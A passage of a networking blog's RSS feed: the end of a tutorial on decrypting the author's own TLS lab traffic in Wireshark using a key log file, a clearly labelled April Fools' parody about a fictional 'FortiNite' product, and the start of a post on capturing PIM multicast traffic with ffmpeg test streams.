CLIENT_TRAFFIC_SECRET_0 24a0ba3ed6a030ec8e3dfaaf467fedf990caa19957f92d05a2a424a8a7ec0373 68b953f99d56afffb8bcdfbe8e14fa00a7da5a3df0fee6c6ed6efd20317acf9b
SERVER_TRAFFIC_SECRET_0 24a0ba3ed6a030ec8e3dfaaf467fedf990caa19957f92d05a2a424a8a7ec0373 9833238deb0bc979f8d2384da9c318297ae89b95cd88cfed1cf6dd27ba3f3873
EXPORTER_SECRET 24a0ba3ed6a030ec8e3dfaaf467fedf990caa19957f92d05a2a424a8a7ec0373 7b95217e262cb72a82241da2785d647ea4336215f9573b9a4fc657d05e91ee84</pre><p>
<h2>Decryption, Please!</h2>
<p>Now, within Wireshark, go to Edit -&gt; Preferences -&gt; Protocols -&gt; TLS and select your sslkey.log file at the &#8220;(Pre)-Master-Secret log filename&#8221;:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14289" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys-1024x754.png" alt="" width="604" height="445" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys-1024x754.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys-300x221.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys-768x566.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys-1536x1131.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-01-Protocols-TLS-sslkeys.png 1955w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>After hitting OK, <strong>Wireshark will decrypt all applicable TLS sessions directly</strong>. The following screenshot shows the original (encrypted) PCAP on the left-hand side, while the decrypted traffic on the right-hand side. While the original TLS traffic shows only &#8220;Application Data&#8221;, which is de facto random data, the decrypted part shows the actual protocol, an HTTP GET in this scenario:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14290" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-1024x609.png" alt="" width="604" height="359" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-1024x609.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-300x178.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-768x457.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-1536x913.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-02-Decrypted-Traffic-2048x1218.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>On the Packet Bytes section (bottom right), you can switch between the original Packet vs. the Decrypted TLS view:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14291" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-1024x609.png" alt="" width="604" height="359" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-1024x609.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-300x178.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-768x457.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-1536x913.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-03-switch-between-Packet-or-Decrypted-TLS-2048x1218.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>If you want to distribute the PCAP *with* the session keys, you can <strong>inject them into the capture file</strong>, which then turns into a *.pcapng file format: Edit -&gt; Inject TLS Secrets:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14292" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets-1024x818.png" alt="" width="604" height="482" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets-1024x818.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets-300x240.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets-768x613.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets-1536x1226.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-04-Inject-TLS-Secrets.png 2000w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h2>Sample in the Ultimate PCAP</h2>
<p>The sample of HTTPS traffic shown here, including the injected TLS keys, is part of the <a href="https://weberblog.net/the-ultimate-pcap/">Ultimate PCAP</a>. Please download and analyse it by yourself &#8211; the display filter to find those packets could be: 
			<span id="urvanov-syntax-highlighter-6a78d868a3421777781059" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">http and tcp.port eq 443</span></span>.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetfalcon-packet-capture" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketFalcon.1208x232.webp" /></a></div>
<h2>Follow {HTTP|TCP|TLS} Stream</h2>
<p>Note the differences between the three &#8220;Follow &#8230;&#8221; methods. The well-known &#8220;<strong>Follow TCP Stream</strong>&#8221; will still show the encrypted data:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14294" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-1024x736.png" alt="" width="604" height="434" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-1024x736.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-300x216.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-768x552.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-1536x1103.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-05-Follow-TCP-Stream-2048x1471.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>while the &#8220;<strong>Follow TLS Stream</strong>&#8221; shows the <strong>DEcrypted data</strong>, but still with the HTTP Content-Encoding such as gzip. Hence: still not completely readable (though decrypted):</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14295" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-1024x735.png" alt="" width="604" height="434" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-1024x735.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-300x215.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-768x551.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-1536x1103.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-06-Follow-TLS-Stream-2048x1471.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Finally, the &#8220;<strong>Follow HTTP Stream</strong>&#8220;, when clicked on an HTTP packet (rather than on a mere TCP packet), brings us readable plain-text HTTP completely:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14296" src="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-1024x735.png" alt="" width="604" height="434" srcset="https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-1024x735.png 1024w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-300x215.png 300w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-768x551.png 768w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-1536x1103.png 1536w, https://weberblog.net/wp-content/uploads/2026/03/Decrypting-TLS-with-Wireshark-07-Follow-HTTP-Stream-2048x1471.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>That&#8217;s it. Happy decrypting. ;)</p>
<h2>Further Reading/Watching</h2>
<ul>
<li>YouTube David Bombal &amp; Chris Greer: <a href="https://www.youtube.com/watch?v=yodDbgoCnLM" target="_blank" rel="noopener">Decrypting TLS, HTTP/2 and QUIC with Wireshark</a></li>
<li>&#8220;<a href="https://lekensteyn.nl/files/wireshark-ssl-tls-decryption-secrets-sharkfest18eu.pdf" target="_blank" rel="noopener">SSL/TLS decryption: uncovering secrets</a>&#8221; presentation by Peter Wu, at <a href="https://sharkfest.wireshark.org/retrospective/sfeu/sf18eu/" target="_blank" rel="noopener">SharkFest’18 EUROPE</a>, the Wireshark Developer and User Conference</li>
<li>Palo Alto Networks: <a href="https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/" target="_blank" rel="noopener">Wireshark Tutorial: Decrypting HTTPS Traffic</a></li>
<li>Netresec: <a href="https://www.netresec.com/?page=Blog&amp;month=2024-08&amp;post=How-to-Inspect-TLS-Encrypted-Traffic" target="_blank" rel="noopener">How to Inspect TLS Encrypted Traffic</a> (please note the table that lists various types of keys and configurations needed)</li>
</ul>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@markusspiske?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Markus Spiske</a> on <a href="https://unsplash.com/photos/matrix-movie-still-iar-afB0QQw?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/decrypting-tls-with-wireshark/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14278</post-id>	</item>
		<item>
		<title>Introducing FortiNite: Fortinet’s Low‑Latency Power‑Up for Fortnite</title>
		<link>https://weberblog.net/introducing-fortinite-fortinets-low-latency-power-up-for-fortnite/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=introducing-fortinite-fortinets-low-latency-power-up-for-fortnite</link>
					<comments>https://weberblog.net/introducing-fortinite-fortinets-low-latency-power-up-for-fortnite/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 01 Apr 2026 07:11:36 +0000</pubDate>
				<category><![CDATA[Bandwidth/Delay]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[Acceleration]]></category>
		<category><![CDATA[April 1st]]></category>
		<category><![CDATA[Fortnite]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[Latency]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14300</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />After years of customers confusing Fortinet with Fortnite, the two companies finally decided to lean into the chaos. The result: FortiNite — a joint innovation designed to deliver “next‑gen latency acceleration” for Fortnite players worldwide, a groundbreaking collaboration with Epic Games’ Fortnite. For years, support teams across the globe have endured phrases like “I can’t &#8230; <a href="https://weberblog.net/introducing-fortinite-fortinets-low-latency-power-up-for-fortnite/" class="more-link">Continue reading <span class="screen-reader-text">Introducing FortiNite: Fortinet’s Low‑Latency Power‑Up for Fortnite</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/03/Introducing-FortiNite-Fortinets-Low‑Latency-Power‑Up-for-Fortnite-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>After years of customers confusing Fortinet with Fortnite, the two companies finally decided to lean into the chaos. The result: <strong>FortiNite</strong> — a joint innovation designed to deliver <strong>“next‑gen latency acceleration” for Fortnite players</strong> worldwide, a groundbreaking collaboration with Epic Games’ Fortnite.</p>
<p><span id="more-14300"></span></p>
<p>For years, support teams across the globe have endured phrases like “I can’t reach my Fortnite firewall” or “Is the Fortinet battle pass included?” Eventually, both companies realised:</p>
<div class="su-quote su-quote-style-default"><div class="su-quote-inner su-u-clearfix su-u-trim">“If people keep mixing us up anyway… why not build something together?”</div></div>
<h2>What is FortiNite?</h2>
<p>FortiNite is marketed as a “<em>next‑generation, AI‑enhanced, cloud‑based latency reduction infrastructure accelerator</em>”.</p>
<p>In plain English: <strong>FortiNite makes Fortnite faster. Much faster.</strong></p>
<p>Leveraging Fortinet’s global Security Fabric and Epic’s galaxy of servers full of excited players, FortiNite promises:</p>
<p><strong>🚀 Sub‑millisecond latency boosts</strong><br />
<strong>🔐 Ultra‑secure, accelerated gameplay tunnels</strong><br />
<strong>🎯 Skill‑based match acceleration mode</strong><br />
<strong>⚡ Adaptive Lag Prevention (ALP™)</strong><br />
<strong>🛡️ Anti‑Tilt Protection — because lag is the #1 cause of dramatic headset slams</strong></p>
<p>Early internal benchmarks claim that FortiNite grants players “the equivalent of three additional shotgun reaction windows.”</p>
<p>Scientific? No.<br />
Convenient? Absolutely.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetlion-aggregation-packet-broker" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketLion.1208x232.webp" /></a></div>
<h2>Now with Full IPv6 Turbo Mode</h2>
<p>One of FortiNite’s most celebrated features is its <strong>exclusive IPv6 Performance Pipeline</strong>.</p>
<p>Because while many ISPs still treat IPv6 like an optional DLC, FortiNite elevates it to its rightful place: the <strong>ultimate low‑latency gaming protocol (ULLGP)</strong>.</p>
<p>FortiNite takes advantage of:</p>
<p>✨ <strong>Direct end‑to‑end IPv6 paths</strong> with fewer NAT dragons to slay<br />
🚫 <strong>Zero NAT traversal</strong> — because NAT clearly stands for “Not Actually Tactical”<br />
📈 <strong>Reduced congestion</strong>, thanks to IPv6 lanes that nobody else uses<br />
💡 <strong>SmartFlow6™</strong> — an AI engine that automatically reroutes packets away from congested IPv4 players (also known as “the lagging mortals”)</p>
<p>Fortinet humorously noted in their launch statement:</p>
<div class="su-quote su-quote-style-default"><div class="su-quote-inner su-u-clearfix su-u-trim">“IPv4 players will still see improvements, but FortiNite truly shines on IPv6 — like switching from a shopping cart to a sports car.”</div></div>
<p>Epic Games added:</p>
<div class="su-quote su-quote-style-default"><div class="su-quote-inner su-u-clearfix su-u-trim">“We didn’t know IPv6 could be fun until now.”</div></div>
<h2>Integration with Existing Fortinet Products</h2>
<p>True to the Forti‑ecosystem approach, FortiNite integrates seamlessly:</p>
<ul>
<li><strong>FortiGate</strong>: Lights up in a “Victory Royale” pattern when latency dips below 5 ms</li>
<li><strong>FortiAnalyzer</strong>: Offers dashboards correlating your K/D ratio with packet‑loss spikes</li>
<li><strong>FortiManager</strong>: Lets admins distribute “No‑Build Mode” across entire VLANs</li>
<li><strong>FortiAP</strong>: Features a stealth SSID named <em>SweatyLobby_5Ghz</em> for peak tactical advantage</li>
</ul>
<p>These features are, of course, “in beta” — a phrase which here means “completely fictional”.</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@elladon?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">ELLA DON</a> on <a href="https://unsplash.com/photos/a-person-working-on-a-computer-in-a-dark-room-pjhYzDw0HWM?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/introducing-fortinite-fortinets-low-latency-power-up-for-fortnite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14300</post-id>	</item>
		<item>
		<title>Protocol Independent Multicast (PIM) Capture</title>
		<link>https://weberblog.net/protocol-independent-multicast-pim-capture/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=protocol-independent-multicast-pim-capture</link>
					<comments>https://weberblog.net/protocol-independent-multicast-pim-capture/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 18 Mar 2026 11:55:47 +0000</pubDate>
				<category><![CDATA[Routing]]></category>
		<category><![CDATA[Cisco Router]]></category>
		<category><![CDATA[ffmpeg]]></category>
		<category><![CDATA[IGMP]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[MLD]]></category>
		<category><![CDATA[Multicast]]></category>
		<category><![CDATA[PIM]]></category>
		<category><![CDATA[ProfiShark]]></category>
		<category><![CDATA[Raspberry Pi]]></category>
		<category><![CDATA[Ultimate PCAP]]></category>
		<category><![CDATA[VLC]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14023</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />You never stop learning. One topic that hadn’t crossed my path in the past decade is: Multicast. Whew. Alongside all the technical literature, online presentations, and various blog posts, I decided to approach it the classic way &#8211; through packet captures. ;) So here’s a new part of the #UltimatePCAP, which contains quite a bit &#8230; <a href="https://weberblog.net/protocol-independent-multicast-pim-capture/" class="more-link">Continue reading <span class="screen-reader-text">Protocol Independent Multicast (PIM) Capture</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/11/Protocol-Independent-Multicast-PIM-Capture-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>You never stop learning. One topic that hadn’t crossed my path in the past decade is: <strong>Multicast</strong>. Whew. Alongside all the technical literature, online presentations, and various blog posts, I decided to approach it the classic way &#8211; through packet captures. ;)</p>
<p>So here’s a new part of the <a href="https://weberblog.net/the-ultimate-pcap/">#UltimatePCAP</a>, which contains quite a bit of <strong>PIM traffic</strong>, including Hello, Join/Prune, Register (via unicast!), and more. Of course, for IPv6 and legacy IP (IPv4). Let&#8217;s have a look:</p>
<p><span id="more-14023"></span></p>
<p>Please note that I&#8217;m *not* a multicast expert. Luckily, there are many good resources out there. I recommend this Cisco Live presentation from Aleksandar Sofranic (YouTube): <a href="https://www.youtube.com/watch?v=UEmmEMzPn6Q" target="_blank" rel="noopener">IP Multicast Introduction and Troubleshooting</a>, or this (partially free) <a href="https://networklessons.com/multicast" target="_blank" rel="noopener">multicast course on NetworkLessons.com</a>, or <a href="https://blog.golle.org/posts/Multicast/Intro" target="_blank" rel="noopener">this blog post series from Emil Boklund</a>.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<h2>Lab Setup</h2>
<p>This is my lab, consisting of <strong>2x Cisco router 2811</strong> with <strong>IOS version 15.1(4)M12a</strong> and <strong>1x Palo Alto Networks firewall PA-440</strong> with <strong>PAN-OS 11.1.10-h1</strong> (which only supports legacy IP for multicast, not IPv6). Everything is routed via OSPF/OSPFv3, while PIM is used for multicast traffic. The rendezvous point (RP) is statically configured on R1&#8217;s loopback address. A Raspberry Pi on the right-hand side is offering a multicast stream. Three clients are placed in the lab to receive the streams. The capture point was between the routers R1 and R2, leveraging a real TAP, namely the <a href="https://weberblog.net/my-network-companion-the-profishark/">ProfiShark</a> from Profitap.</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14045" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-1024x616.png" alt="" width="604" height="363" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-1024x616.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-300x181.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-768x462.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-1536x924.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Lab-2048x1232.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Raspberry Pi ffmpeg stream (thanks to <a href="https://www.reddit.com/r/networking/comments/1jppn6y/which_multicast_stream_for_testing_purposes/" target="_blank" rel="noopener">this Reddit posting</a>):</p><pre class="urvanov-syntax-highlighter-plain-tag">ffmpeg -f lavfi -re -i "testsrc=size=640x360:rate=30:decimals=2" -c:v libx264 -f mpegts "udp://239.23.11.10:1234?pkt_size=1316"</pre><p>
Similar for IPv6:</p><pre class="urvanov-syntax-highlighter-plain-tag">ffmpeg -f lavfi -re -i "testsrc=size=640x360:rate=25:decimals=2" -c:v libx264 -f mpegts "udp://[ff05::2311]:1234?pkt_size=1316"</pre><p>
The clients/receivers used VLC to play the streams via 
			<span id="urvanov-syntax-highlighter-6a78d868a36cd773307275" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">udp://@239.23.11.10:1234</span></span>, respectively 
			<span id="urvanov-syntax-highlighter-6a78d868a36cf135893767" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">udp://@[ff05::2311]:1234</span></span>.</p>
<h2>It&#8217;s Capturing Time!</h2>
<p>This was the sequence of events that I captured for <strong>IPv4</strong> on 2025-11-26. All times in UTC:</p>
<ul>
<li>15:27 &#8211; cable between R1 and R2 was plugged into/through the TAP</li>
<li>15:31 &#8211; start of ffmpeg on the Raspberry Pi, sending to 239.23.11.10 on port 1234
<ul>
<li>15:34 &#8211; client 1 starts listening to the multicast stream via VLC</li>
<li>15:36 &#8211; client 1 stopped viewing (stream is cropped in the PCAP)</li>
</ul>
</li>
<li>15:42 &#8211; stop of ffmpeg on the Raspberry Pi
<ul>
<li>15:49 &#8211; client 1 starts again, though the stream is not present anymore</li>
<li>15:50 &#8211; client 1 stops</li>
</ul>
</li>
<li>15:51 &#8211; client 2 starts VLC, though the stream is not present</li>
<li>15:53 &#8211; client 2 stops</li>
</ul>
<p>For <strong>IPv6</strong>, the following sequence was captured on 2025-12-03, all times are in UTC as well:</p>
<ul>
<li>11:07 &#8211; cable between R1 and R2 was plugged into/through the TAP</li>
<li>11:10 &#8211; start of ffmpeg on Raspi, sending to [ff05::2311]:1234
<ul>
<li>11:12 &#8211; client 3 starts listening to the multicast stream via VLC</li>
<li>11:14 &#8211; client 3 stops</li>
</ul>
</li>
<li>11:16 &#8211; stop of ffmpeg on the Raspi
<ul>
<li>11:22 &#8211; client 3 starts again, though stream not running</li>
<li>11:23 &#8211; client 3 stops</li>
</ul>
</li>
</ul>
<p>Some notes concerning the capture:</p>
<ul>
